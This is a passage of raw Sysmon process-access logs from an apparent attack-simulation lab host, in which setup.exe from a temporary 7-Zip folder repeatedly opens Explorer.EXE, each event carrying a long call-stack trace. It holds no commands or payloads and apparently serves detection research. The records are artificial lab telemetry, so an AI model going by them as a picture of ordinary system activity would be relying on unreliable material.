13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows